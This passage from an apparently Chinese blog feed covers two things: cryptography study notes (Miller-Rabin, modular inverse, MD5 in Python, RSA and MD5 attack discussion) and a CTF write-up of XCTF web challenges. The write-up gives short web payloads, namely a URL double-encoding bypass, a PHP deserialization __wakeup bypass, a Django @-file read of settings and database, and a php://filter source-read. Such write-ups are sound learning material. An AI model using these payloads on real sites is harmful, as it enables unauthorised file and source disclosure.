要测试n是否为素数,首先将n−1分解为(2^s)d</span></span><br><span class="line"><span class="string"> 在每次测试开始时,先随机选一个介于[1,n−1]的整数a,之后如果对所有的r∈[0,s−1] ,</span></span><br><span class="line"><span class="string"> 若a^d ≠1 (mod n)且 a^(2^rd)≠−1(mod n),则n是合数</span></span><br><span class="line"><span class="string"> 否则,n 有 3/4 的概率为素数,增加测试的次数,该数是素数的概率会越来越高。</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> <span class="comment"># 偶数直接不通过</span></span><br><span class="line"> <span class="keyword">if</span> n % <span class="number">2</span> == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> s, d = <span class="number">0</span>, n - <span class="number">1</span></span><br><span class="line"> <span class="comment"># 将p-1分解为(2**s)d</span></span><br><span class="line"> <span class="keyword">while</span> d % <span class="number">2</span> == <span class="number">0</span>:</span><br><span class="line"> s += <span class="number">1</span></span><br><span class="line"> d //= <span class="number">2</span></span><br><span class="line"> <span class="comment"># 进行k次检验566++3.+6</span></span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(k):</span><br><span class="line"> <span class="comment"># 每次测试时,随机选取一个[1,n-1]的整数a</span></span><br><span class="line"> a = randint(<span class="number">1</span>, n - <span class="number">1</span>)</span><br><span class="line"> x = pow(a, d, n) <span class="comment"># x = a**d mod(n)</span></span><br><span class="line"> <span class="comment"># 如果a**d(mod n)=1,说明当次检验通过(不是合数),进行下一轮检验</span></span><br><span class="line"> <span class="keyword">if</span> x == <span class="number">1</span> <span class="keyword">or</span> x == n - <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">continue</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> flag = <span class="number">0</span></span><br><span class="line"> <span class="comment"># 对所有的r∈[0, s-1],判断a**((2**r)*d) (mod n)是否等于-1,</span></span><br><span class="line"> <span class="keyword">for</span> r <span class="keyword">in</span> range(s):</span><br><span class="line"> <span class="comment"># x**pow(2,r) == a**d**pow(2,r)</span></span><br><span class="line"> x = pow(x, <span class="number">2</span>, n)</span><br><span class="line"> <span class="keyword">if</span> x == n - <span class="number">1</span>:</span><br><span class="line"> flag = <span class="number">1</span></span><br><span class="line"> <span class="keyword">break</span></span><br><span class="line"> <span class="comment"># 若a**d≠1(mod n)且a**pow(2,r)**≠</span></span><br><span class="line"> <span class="keyword">if</span> flag == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"> <span class="keyword">return</span> <span class="literal">True</span></span><br></pre></td></tr></table></figure></div><h3 id="带模的幂运算"><a href="#带模的幂运算" class="headerlink" title="带模的幂运算"></a>带模的幂运算</h3><p>原理:模重复平方运算,Python 代码如下:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">fast_mod</span><span class="params">(x, n, p)</span>:</span></span><br><span class="line"> x = x % p</span><br><span class="line"> res = <span class="number">1</span></span><br><span class="line"> <span class="keyword">while</span> n!=<span class="number">0</span>:</span><br><span class="line"> <span class="keyword">if</span> n & <span class="number">1</span>:</span><br><span class="line"> res = (res * x) % p</span><br><span class="line"> n >>= <span class="number">1</span> <span class="comment"># 相当于 n //= 2</span></span><br><span class="line"> x = (x * x) % p</span><br><span class="line"> <span class="keyword">return</span> res</span><br></pre></td></tr></table></figure></div><h3 id="求逆运算"><a href="#求逆运算" class="headerlink" title="求逆运算"></a>求逆运算</h3><p>扩展欧几里得法</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">extended_gcd</span><span class="params">(a, b)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 扩展的欧几里得算法计算gcd的最大公因子g以及x和y,满足g=ax+by</span></span><br><span class="line"><span class="string"> 递归式的推导过程:</span></span><br><span class="line"><span class="string"> ax₁ + by₁ = gcd(a,b)</span></span><br><span class="line"><span class="string"> bx₂ + (a%b)y₂ = gcd(b,a%b)</span></span><br><span class="line"><span class="string"> ∵ gcd(a,b) = gcd(b,a%b) 且 a%b = a - (a//b)*b</span></span><br><span class="line"><span class="string"> ∴ bx₂ + (a%b)y₂</span></span><br><span class="line"><span class="string"> = bx₂ + [a - (a//b)*b]y₂</span></span><br><span class="line"><span class="string"> = ay₂ + bx₂ - (a//b)by₂</span></span><br><span class="line"><span class="string"> = ay₂ + b[x₂ - (a//b)y₂]</span></span><br><span class="line"><span class="string"> = ax₁ + by₁</span></span><br><span class="line"><span class="string"> ∴待定系数法得:x₁ = y₂, y₁ = x₂ - (a//b)y₂</span></span><br><span class="line"><span class="string"> 递归终止条件: 当b = 0, gcd(a,b) = a, 此时 x = 1,y = 0</span></span><br><span class="line"><span class="string"> :return: (g,s,t)</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> <span class="keyword">if</span> b == <span class="number">0</span>:</span><br><span class="line"> <span class="keyword">return</span> a, <span class="number">1</span>, <span class="number">0</span></span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> g, x, y = extended_gcd(b, a % b) <span class="comment"># 先得到更里层的x₂,y₂,</span></span><br><span class="line"> <span class="keyword">return</span> g, y, x - (a // b) * y <span class="comment"># 再根据得到的x₂,y₂,计算x₁,y₁</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">mod_inverse</span><span class="params">(a, m)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 计算模逆,即a**-1 (mod m)</span></span><br><span class="line"><span class="string"> :param a: 底数</span></span><br><span class="line"><span class="string"> :param m: 模数</span></span><br><span class="line"><span class="string"> :return: 逆元</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> g, x, y = extended_gcd(a, m) <span class="comment"># ax + my = 1</span></span><br><span class="line"> <span class="comment"># 若a,m不互素,则不可逆</span></span><br><span class="line"> <span class="keyword">if</span> g != <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">raise</span> Exception(str(a) + <span class="string">' is not invertible!'</span>)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> x % m</span><br></pre></td></tr></table></figure></div><h3 id="运行结果-4"><a href="#运行结果-4" class="headerlink" title="运行结果"></a>运行结果</h3><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/q13EHr9WD2caByv.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="安全性分析-4"><a href="#安全性分析-4" class="headerlink" title="安全性分析"></a>安全性分析</h3><p>RSA的安全性依赖于大数分解问题,目前,还未能从数学上证明由𝑐和𝑒计算出𝑚一定需要分解𝑛,然而,如果新方法能使密码分析者推算出𝑑,它也就成为大数分解的一个新方法</p><p>非对称加密算法中 1024 bit 密钥的强度相当于对称加密算法 80bit 密钥的强度。但是,从效率上,密钥长度增长一倍,公钥操作所需时间增加约 4 倍,私钥操作所需时间增加约 8 倍,公私钥生成时间约增长16倍。所以,我们要权衡一下效率和安全性。一般来说, 1024 bit 只能用于加密 最多117 字节的明文。</p><p><strong>低加密指数攻击:</strong></p><p>为了使加密高效,一般希望选取较小的加密指数 ee ,但是 ee 不能太小,否则容易遭到低加密指数攻击。</p><p>假设用户使用的密钥 e=3e=3 。考虑到加密关系满足:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/VyG7I1Dj6BwvsnA.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>低加密指数广播攻击:</strong></p><p>还有一种情况是如果给 k 个用户发的都是同个低加密指数比如 e=3 ,在不同的模数 n1.n2,n3下 ,可由 CRT(中国剩余定理) 解出 m3 ,从而直接开三次根解出 m。</p><p><strong>共模攻击:</strong></p><p>场景:n 相同(让多个用户使用相同的模数 n ),但他们的公私钥对不同。这样,我们可以在已知 n,e1,e2,c1,c2 的情况下解出 m 。过程如下:</p><p>其实有个隐形的前提条件是:<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/4JdHZSYhe82GMLr.png" alt="" title=""> </div> <div class="image-caption"></div> </figure></p><p>存在 s1,s2 使得:<figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/vhlaZ1nQ2OBoCJb.png" alt="" title=""> </div> <div class="image-caption"></div> </figure></p><p>又由 RSA 定义可知:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/7Mh9IqiXePwf1ZJ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>可得出:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/GQT4XhnFMAlzmKE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这样,我们仅需要使用扩展欧几里得算法求出 s1,s2s1,s2 便可解出明文。</p><h2 id="MD5加密"><a href="#MD5加密" class="headerlink" title="MD5加密"></a>MD5加密</h2><h3 id="概述-4"><a href="#概述-4" class="headerlink" title="概述"></a>概述</h3><p>Hash,一般翻译做散列、杂凑,或音译为哈希,是把任意长度的输入(又叫做预映射)通过散列算法变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是说,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,所以不可能从散列值来确定唯一的输入值。简单的说就是是将任意长度的输入变换为固定长度的输出的不可逆的单向密码体制。</p><p>MD5(Message-Digest Algorithm,信息摘要算法),是由美国著名密码学家Rivest设计的一种密码散列函数,可以将长度小于264比特的消息,按512比特的分组单位进行处理,输出一个128比特的消息摘要。</p><p>MD5具有Hash函数的所有特性。</p><p> ①压缩性。无论输入的明文多长,计算出来的MD5值长度固定为128位。</p><p> ②易计算性。由原数据容易计算出MD5值 。</p><p> ③抗碰撞性。知道明文和MD5值,很难找到相同MD5值相同的明文。</p><p> ④抗修改性。即便修改一个字节,计算出来的MD5值也会存在极大差异</p><p> MD5是在MD4基础上发展而来的,虽然比MD4稍慢,但更安全,实现了更快的雪崩效应,在实际应用中更受欢迎。</p><p> 散列函数的安全性主要体现在其良好的单向性和对碰撞的有效避免。由于散列变换是一种压缩变换,输入和输出长度相差极大啊,很难通过输出来确定 输入。但是,散列函数经常被用于数据改动检测,如果一个合法消息和一个非法消息能够碰撞,攻击就可以用合法消息生成散列值,再以非法消息作为该散列值的对应消息进行欺骗,且是他人无法识别。所以,对于Hash函数的攻击,攻击者的主要目标不是恢复原始明文,而是用相同散列值的非法消息来替代合法消息进行伪造和欺骗。</p><p> 对于MD5的碰撞研究,王小云教授做出了突破性的贡献,她的研究成果可以概括为:对于给定的M1,可以比较快速地找到M2,使得H(M1)=H(M2)。在2004年发表的论文中,她在IBM P690上用了一个小时左右就找了这样的一个碰撞,放到现在的计算机上面,这个时间会更短。所以,如果是要求高度保密的场所,比如说军工之类,MD5已经不安全了,应更换为更安全的Hash算法;但对于民用来说,一般没有人有能承受那么大计算量的设备,在一些不重要的认证上面仍可使用。</p><h3 id="MD5算法原理"><a href="#MD5算法原理" class="headerlink" title="MD5算法原理"></a>MD5算法原理</h3><h4 id="消息填充"><a href="#消息填充" class="headerlink" title="消息填充"></a>消息填充</h4><ul><li>使消息长度模512=448如果消息长度模512恰等于448,增加512个填充比特。即填充的个数为1~512,填充方法:第1比特为1,其余全部为0</li><li>将消息长度转换为64比特的数值,如果长度超过64比特所能表示的数据长度,值保留最后64比特添加到填充数据后面,使数据为512比特的整数倍</li><li>512比特按32比特分为16组</li></ul><p><strong>注:64位数据长度存储的时候是小端序</strong></p><h4 id="初始化链接变量"><a href="#初始化链接变量" class="headerlink" title="初始化链接变量"></a>初始化链接变量</h4><p>使用4个32位的寄存器A, B,C, D存放4个固定的32位整型参数,用于第一轮迭代,这里需要注意的是,寄存器的值要转化为小端序。</p><p>A=0x01234567 B=0x89abcdef C=0xfedcba98 D=0x76543210</p><h4 id="分组处理"><a href="#分组处理" class="headerlink" title="分组处理"></a>分组处理</h4><p>与分组密码分组处理相似,有4轮步骤,将512比特的消息分组平均分为16个子分组,每个子分组有32比特,参与每一轮的的16步运算,每步输入是4个32比特的链接变量和一个32位的的消息子分组,经过这样的64步之后得到4个寄存器的值分别与输入的链接变量进行模加。</p><h4 id="步函数"><a href="#步函数" class="headerlink" title="步函数"></a>步函数</h4><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/I9rGW8NK5OQRBV3.png" alt="image-20210112205456498" title=""> </div> <div class="image-caption">image-20210112205456498</div> </figure><p>该函数包括 4 轮,每轮 16 步,上一步的链接变量 D, B, C 直接赋值给下一步的链接变量 A, C, D。</p><p>A 先和非线性函数的结果加一下,结果再和 M[j] 加一下,结果再和 T[i] 加一下,结果再循环左移 s 次,结果再和原来的 B 加一下,最后的得到新 B。</p><p>非线性函数:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/xSM8oL6G13Yklgc.png" alt="image-20210112205446350" title=""> </div> <div class="image-caption">image-20210112205446350</div> </figure><h2 id="代码实现"><a href="#代码实现" class="headerlink" title="代码实现"></a>代码实现</h2><h3 id="消息填充-1"><a href="#消息填充-1" class="headerlink" title="消息填充"></a>消息填充</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 对消息进行填充</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">message_padding</span><span class="params">(m)</span>:</span></span><br><span class="line"> <span class="comment"># 计算附加的64为长度(小端序表示)</span></span><br><span class="line"> len_padding = bin2little(bin(len(m))[<span class="number">2</span>:].zfill(<span class="number">64</span>))</span><br><span class="line"> m += <span class="string">'1'</span></span><br><span class="line"> <span class="keyword">while</span> len(m) % <span class="number">512</span> != <span class="number">448</span>:</span><br><span class="line"> m += <span class="string">'0'</span></span><br><span class="line"> <span class="keyword">return</span> m + len_padding</span><br></pre></td></tr></table></figure></div><h3 id="初始化链接变量-1"><a href="#初始化链接变量-1" class="headerlink" title="初始化链接变量"></a>初始化链接变量</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 初始链接变量(小端序表示)</span></span><br><span class="line">IV_A, IV_B, IV_C, IV_D = (<span class="number">0x67452301</span>, <span class="number">0xefcdab89</span>, <span class="number">0x98badcfe</span>, <span class="number">0x10325476</span>)</span><br></pre></td></tr></table></figure></div><h3 id="分组处理及步函数"><a href="#分组处理及步函数" class="headerlink" title="分组处理及步函数"></a>分组处理及步函数</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 压缩函数(对每个512bit分组进行处理)</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">compress_func</span><span class="params">(a, b, c, d, m)</span>:</span></span><br><span class="line"> <span class="string">"""</span></span><br><span class="line"><span class="string"> 压缩函数函数,对每512bit得分组进行处理,包括4轮,每轮16步</span></span><br><span class="line"><span class="string"> :param a, b, c, d: 输入链接变量(即前一个分组的输出链接变量)</span></span><br><span class="line"><span class="string"> :param m: 512bit的消息分组</span></span><br><span class="line"><span class="string"> :return: A,B,C,D 输出链接变量</span></span><br><span class="line"><span class="string"> """</span></span><br><span class="line"> <span class="comment"># 对每一分组的初始链接变量进行备份</span></span><br><span class="line"> A, B, C, D = a, b, c, d</span><br><span class="line"> <span class="comment"># 将512bit分为16组,每组32bit</span></span><br><span class="line"> m_list_32 = re.findall(<span class="string">r'.{32}'</span>, m)</span><br><span class="line"> <span class="comment"># 每个分组经过4轮函数</span></span><br><span class="line"> <span class="keyword">for</span> round_index <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line"> <span class="comment"># 每轮有16步</span></span><br><span class="line"> <span class="keyword">for</span> step_index <span class="keyword">in</span> range(<span class="number">16</span>):</span><br><span class="line"> <span class="comment"># 对每一步的链接变量进行备份</span></span><br><span class="line"> AA, BB, CC, DD = A, B, C, D</span><br><span class="line"> <span class="comment"># 每一轮选择不同的非线性函数</span></span><br><span class="line"> <span class="keyword">if</span> round_index == <span class="number">0</span>:</span><br><span class="line"> func_out = F(B, C, D)</span><br><span class="line"> <span class="keyword">elif</span> round_index == <span class="number">1</span>:</span><br><span class="line"> func_out = G(B, C, D)</span><br><span class="line"> <span class="keyword">elif</span> round_index == <span class="number">2</span>:</span><br><span class="line"> func_out = H(B, C, D)</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> func_out = I(B, C, D)</span><br><span class="line"> A, C, D = D, B, C</span><br><span class="line"> <span class="comment"># B模加非线性函数的输出</span></span><br><span class="line"> B = mod_add(AA, func_out)</span><br><span class="line"> <span class="comment"># 模加消息分组(注意为大端序)</span></span><br><span class="line"> B = mod_add(B, int(bin2little(m_list_32[M_index_[round_index][step_index]]), <span class="number">2</span>))</span><br><span class="line"> <span class="comment"># print(type(B))</span></span><br><span class="line"> <span class="comment"># 模加伪随机常数</span></span><br><span class="line"> B = mod_add(B, T(<span class="number">16</span> * round_index + step_index + <span class="number">1</span>))</span><br><span class="line"> <span class="comment"># 循环左移s位</span></span><br><span class="line"> B = rol(B, shift_[round_index][step_index])</span><br><span class="line"> <span class="comment"># 模加BB</span></span><br><span class="line"> B = mod_add(B, BB)</span><br><span class="line"> <span class="comment"># print(str(16 * round_index + step_index + 1).zfill(2), end=" ")</span></span><br><span class="line"> <span class="comment"># print(hex(A).replace("0x", "").replace("L", "").zfill(8), end=" ")</span></span><br><span class="line"> <span class="comment"># print(hex(B).replace("0x", "").replace("L", "").zfill(8), end=" ")</span></span><br><span class="line"> <span class="comment"># print(hex(C).replace("0x", "").replace("L", "").zfill(8), end=" ")</span></span><br><span class="line"> <span class="comment"># print(hex(D).replace("0x", "").replace("L", "").zfill(8))</span></span><br><span class="line"> <span class="comment"># print("*" * 38)</span></span><br><span class="line"> <span class="comment"># 与该分组的初始链接变量异或</span></span><br><span class="line"> A = mod_add(A, a)</span><br><span class="line"> B = mod_add(B, b)</span><br><span class="line"> C = mod_add(C, c)</span><br><span class="line"> D = mod_add(D, d)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> A, B, C, D</span><br></pre></td></tr></table></figure></div><h2 id="运行结果-5"><a href="#运行结果-5" class="headerlink" title="运行结果"></a>运行结果</h2><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/FlKtDS4wyQhzaIj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>找一个在线加密的网站验证一下</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/12/XPN2QDrpIqyfgVz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h2 id="安全性分析-5"><a href="#安全性分析-5" class="headerlink" title="安全性分析"></a>安全性分析</h2><p>攻击者的主要目标不是恢复原始的明文,而是用非法消息替代合法消息进行伪造和欺骗,对哈希函数的攻击也是寻找碰撞的过程。</p><p>基本攻击方法:</p><p>(1)穷举攻击:能对任何类型的Hash函数进行攻击</p><p>最典型方法是“生日攻击”:给定初值𝐻0=H(M),寻找𝑀’≠ 𝑀,使ℎ(𝑀’)= 𝐻0</p><p>(2)密码分析法:依赖于对Hash函数的结构和代数性质分析,采用针对Hash函数弱性质的方法进行攻击。这类攻击方法有中间相遇攻击、修正分组攻击和差分分析等</p><p>MD5算法中,输出的每一位都是输入的每一位的函数,逻辑函数F、G、H、I的复杂迭代使得输出对输入的依赖非常小</p><p>但Berson证明,对单轮的MD5算法,利用差分分析,可以在合理时间内找出碰撞的两条消息</p><p>MD5算法抗密码分析的能力较弱,生日攻击所需代价是试验264个消息</p><p>2004年8月17日,在美国加州圣巴巴拉召开的美密会(Crypto2004)上,中国的王小云、冯登国、来学嘉、于红波4位学者宣布,只需1小时就可找出MD5的碰撞(利用差分分析)</p>]]></content>
<summary type="html">
<p>嫖了各种大佬的博客!</p>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>攻防世界WEB</title>
<link href="https://github.com/gha01un/gha01un.github.io/2021/01/06/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb/"/>
<id>https://github.com/gha01un/gha01un.github.io/2021/01/06/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Cweb/</id>
<published>2021-01-06T14:45:14.455Z</published>
<updated>2021-01-11T02:59:27.637Z</updated>
<content type="html"><![CDATA[<p>网安实验被迫写WEB!</p><a id="more"></a><h2 id="PHP2"><a href="#PHP2" class="headerlink" title="PHP2"></a>PHP2</h2><p><strong>考察.phps源码泄露、URL二次编码绕过</strong></p><p>一开始我也没明白这个题是什么意思,看了大佬的wp才知道是有.phps源码泄露:</p><p>访问index.phps得到源码:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/5QKiaRNHfZjMm6s.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>看源码就可以知道这个是很简单的URL二次编码绕过,所以payload:<code>?id=ad%256din</code></p><p>flag到手。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/XoGcKtPRN4Om7HE.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h2 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h2><p><strong>绕过魔法函数sleep()和wakeup()的反序列化漏洞</strong></p><p>题目名叫<strong>unserialize3</strong>,那应该是跟反序列化有关的题目。</p><p>看一下源码,出现了<code>__wakeup()</code>这个魔法函数:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/ucCKSxwXgT4FPd2.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>unserialize()执行时会检查是否存在一个wakeup()方法。如果存在则先调用wakeup()方法,预先准备对象需要的资源。wakeup()经常用在反序列化操作中。sleep()则相反,是在序列化一个对象的时候被调用。</p><p>这个漏洞的核心是:序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过<code>__wakeup()</code>的执行。</p><p>将题目中的类序列化得到结果:<code>O:4:"xctf":1:{s:4:"flag";s:3:"111";}</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/joaTB6mp8FnqAUR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>简单解释一下这个字符串:</p><p><code>O</code>代表结构类型为<code>类</code>,<code>4</code>表示<code>类名长度</code>,然后是<code>类名</code>、<code>成员个数</code>。</p><p>大括号内的值是:<code>属性名类型</code>、<code>长度</code>、<code>名称</code>;<code>值类型</code>、<code>长度</code>、<code>值</code>。</p><p>如果我们把传入序列化字符串的属性个数改成比1更大的值,就不会触发<code>__wakeup()</code>方法,进而得到flag。</p><p>payload:<code>?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}</code></p><h2 id="Cat"><a href="#Cat" class="headerlink" title="Cat"></a>Cat</h2><p><strong>个人感觉比较综合也比较难的题目,考察的是url编码和django的知识</strong></p><p>打开网页发现是一个ping功能,但是输入正常的用户名没有反应,输入ip地址有反应:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/2nZBMK6YjUhrNag.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>本来因为题目名叫cat,又是ping,以为是命令执行,但是尝试了<code>|</code>、<code>&</code>等都报错,提示<code>Invalid URL</code>。看来题目的本意并不是命令执行。</p><p>看了网上一个大佬的wp才知道这个是跟Django有关的。网站本身是用PHP写的,但是可能有Django的组成部分。</p><p>在url里传参<code>%80</code>报错(URL编码是0~127,80的十六进制是128自然报错),从报错信息的目录结构可以知道这个是Django的项目:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/B8yf5MlTWg3JYun.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/P7XCfZDKoMn21sy.png" alt="image-20210106224024807" title=""> </div> <div class="image-caption">image-20210106224024807</div> </figure><p>其他的没什么信息,又去看了看大佬的wp,发现这个原来还需要用PHP的@前缀:</p><p>根据Django的目录特性,用@进行文件传递,对文件进行读取之后将内容传给url参数,如果有错误信息就可以得到回显,进而取得更多错误信息、帮助我们拿到flag。</p><p>先看看settings.py:</p><p>payload: <code>?url=@/opt/api/api/settings.py</code></p><p>找到数据库文件的存放位置:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/zNeBO1gRmUxaijo.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>看看这个文件:</p><p>payload: <code>?url=@/opt/api/database.sqlite3</code></p><p>搜索CTF得到flag。</p><h2 id="ics-05"><a href="#ics-05" class="headerlink" title="ics-05"></a>ics-05</h2><p>进去之后随便点点发现了这个:</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2021/01/06/Ay3ec2gBkN6HDiL.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>page=index,那应该可以用伪协议读出源码。</p><p>payload:<code>page=php://filter/read=convert.base64-encode/resource=index.php</code></p><p>源码到手,base64解码一下:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="HTML"><figure class="iseeu highlight /html"><table><tr><td class="code"><pre><span class="line"><span class="php"><span class="meta"><?php</span></span></span><br><span class="line"><span class="php">error_reporting(<span class="number">0</span>);</span></span><br><span class="line"></span><br><span class="line"><span class="php">@session_start();</span></span><br><span class="line"><span class="php">posix_setuid(<span class="number">1000</span>);</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br><span class="line"><span class="meta"><!DOCTYPE <span class="meta-keyword">HTML</span>></span></span><br><span class="line"><span class="tag"><<span class="name">html</span>></span></span><br><span class="line"></span><br><span class="line"><span class="tag"><<span class="name">head</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"renderer"</span> <span class="attr">content</span>=<span class="string">"webkit"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">"X-UA-Compatible"</span> <span class="attr">content</span>=<span class="string">"IE=edge,chrome=1"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">name</span>=<span class="string">"viewport"</span> <span class="attr">content</span>=<span class="string">"width=device-width, initial-scale=1, maximum-scale=1"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">link</span> <span class="attr">rel</span>=<span class="string">"stylesheet"</span> <span class="attr">href</span>=<span class="string">"layui/css/layui.css"</span> <span class="attr">media</span>=<span class="string">"all"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">title</span>></span>设备维护ä¸å¿ƒ<span class="tag"></<span class="name">title</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>></span></span><br><span class="line"><span class="tag"></<span class="name">head</span>></span></span><br><span class="line"></span><br><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">ul</span> <span class="attr">class</span>=<span class="string">"layui-nav"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">li</span> <span class="attr">class</span>=<span class="string">"layui-nav-item layui-this"</span>></span><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">"?page=index"</span>></span>云平å�°è®¾å¤‡ç»´æŠ¤ä¸å¿ƒ<span class="tag"></<span class="name">a</span>></span><span class="tag"></<span class="name">li</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">ul</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">fieldset</span> <span class="attr">class</span>=<span class="string">"layui-elem-field layui-field-title"</span> <span class="attr">style</span>=<span class="string">"margin-top: 30px;"</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">legend</span>></span>设备列表<span class="tag"></<span class="name">legend</span>></span></span><br><span class="line"> <span class="tag"></<span class="name">fieldset</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">table</span> <span class="attr">class</span>=<span class="string">"layui-hide"</span> <span class="attr">id</span>=<span class="string">"test"</span>></span><span class="tag"></<span class="name">table</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/html"</span> <span class="attr">id</span>=<span class="string">"switchTpl"</span>></span></span><br><span class="line"><span class="handlebars"><span class="xml"> <span 